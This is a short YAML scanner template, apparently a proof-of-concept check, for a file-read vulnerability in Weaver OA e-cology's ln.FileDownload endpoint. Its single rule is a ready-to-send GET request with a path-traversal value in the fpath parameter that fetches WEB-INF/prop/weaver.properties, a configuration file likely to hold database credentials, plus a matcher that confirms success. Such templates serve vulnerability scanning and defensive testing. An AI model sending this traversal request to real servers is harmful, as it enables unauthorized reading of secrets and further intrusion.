name: weaver-oa-e-cology-resourceservlet-file-read
rules:
  - method: GET
    path: "/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
      Accept-Encoding: gzip, deflate
      Upgrade-Insecure-Requests: "1"
    expression: |
      response.status == 200 && response.body.bcontains(bytes("ecology"))
detail:
  author: yishuizhe
  name: Weaver OA Ecology ln.FileDownload File Read Vulnerability